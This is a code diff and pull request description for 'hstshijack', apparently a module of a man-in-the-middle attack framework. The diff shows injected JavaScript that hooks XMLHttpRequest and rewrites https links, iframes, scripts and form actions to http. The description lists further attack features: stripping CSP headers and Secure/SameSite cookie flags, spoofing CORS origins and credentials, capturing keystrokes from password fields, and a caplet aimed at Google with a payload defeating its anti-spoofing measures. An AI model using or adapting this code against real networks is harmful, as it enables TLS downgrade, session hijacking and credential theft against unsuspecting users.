-          if (obf_var_node.action && obf_var_node.action.match(/^\s*https:/i)) {
-            obf_var_node.action = obf_var_node.action.replace(/(http)s/i, "$1");
-          }
-          break;
-      }
-    } catch(obf_var_ignore) {}
-  });
-}
+  function obf_func_hook_nodes() {
+    document.querySelectorAll("a,iframe,script,form").forEach(function(obf_var_node){
+      try {
+        switch (obf_var_node.tagName) {
+          case "A":
+            if (obf_var_node.href && obf_var_node.href.match(/^\s*https:/i)) {
+              obf_var_node.href = obf_var_node.href.replace(/(http)s/i, "$1");
+            }
+            break;
+          case "IFRAME":
+            if (obf_var_node.src && obf_var_node.src.match(/^\s*https:/i)) {
+              obf_var_node.src = obf_var_node.src.replace(/(http)s/i, "$1");
+            }
+            break;
+          case "SCRIPT":
+            if (obf_var_node.src && obf_var_node.src.match(/^\s*https:/i)) {
+              obf_var_node.src = obf_var_node.src.replace(/(http)s/i, "$1");
+            }
+            break;
+          case "FORM":
+            if (obf_var_node.action && obf_var_node.action.match(/^\s*https:/i)) {
+              obf_var_node.action = obf_var_node.action.replace(/(http)s/i, "$1");
+            }
+            break;
+        }
+      } catch(obf_var_ignore) {}
+    });
+  }
 
-try {
-  obf_func_hook_XMLHttpRequest();
-} catch(obf_var_ignore) {}
+  try {
+    obf_func_hook_XMLHttpRequest();
+  } catch(obf_var_ignore) {}
 
-try {
-  obf_func_hook_nodes();
-} catch(obf_var_ignore) {}
+  try {
+    obf_func_hook_nodes();
+  } catch(obf_var_ignore) {}
 
-try {
-  obf_func_hook_XMLHttpRequest();
-  document.addEventListener("DOMContentLoaded", obf_func_hook_nodes);
-  self.addEventListener("load", obf_func_hook_nodes);
-  setInterval(obf_func_hook_nodes, 4000);
-} catch(obf_var_ignore) {}
+  try {
+    obf_func_hook_XMLHttpRequest();
+    globalThis.addEventListener("DOMContentLoaded", obf_func_hook_nodes);
+    globalThis.addEventListener("load", obf_func_hook_nodes);
+    setInterval(obf_func_hook_nodes, 4000);
+  } catch(obf_var_ignore) {}
+})();
 


### PR DESCRIPTION
This commit contains several changes to the hstshijack module:

- reduced a great deal of overhead by precompiling the regexp selectors in the HTTP proxy script that are repeatedly used by the onRequest and onResponse callbacks
- reduced overhead by changing `==` into `===` and `!=` into `!==` to avoid unnecessary type conversions
- module now decodes and spoofs hostnames found in query parameters
- module removes all CSP headers, not just the first instance
- module removes `Secure` and `SameSite` parameters in cookies
- Access-Control-Allow-Origin header value is set to a spoofed origin, unless it is set to `*` by the server (because credentials are not allowed when Access-Control-Allow-Origin is set to `*`)
- module also spoofs Access-Control-Allow-Credentials (always set to `true`)
- module payloads are now wrapped in a strict context
- module ignores captive portal detection hostnames (such requests would sometimes trigger a captive portal notification)
- *added a `google-search.js` payload that bypasses Google's attempt to mitigate spoofed search results (works, is dirty, needs improvement)
- keystrokes sent to the module that include a password field no longer trigger a whitelisting callback until I figure out why it whitelists all hosts for said client
- fixed automatic whitelisting of spoofed and unspoofed origins
- fixed `hstshijack.ssl.domains` command when domains.txt file contained 20 or more domains
- added `hstshijack.whitelist` command to see which hosts are whitelisted for which clients
- changed `hstshijack.ignore` logic, any domain set to that variable is now ignored regardless of whether they are targeted by `hstshijack.targets` or `hstshijack.payloads`
- changed injection of HTML files, as webmasters clearly cannot be trusted to set the correct Content-Type (I've seen HTML served with `*/javascript` content types, even with a .js extension, and vice versa), it now searches for `<` within the first 1000 bytes of files with a valid markup language extension

*The caplet is configured to attack Google, and a new payload is included as an example of how this module is intended to be used. It's not intended to be used by a skid to target *.com, it's intended to target specific sites for which you have prepared a payload. The truth is that JavaScript can always prevent these automated attacks, and the only way around a host's security is by injecting your own JavaScript that executes before theirs, and is tailored to their site.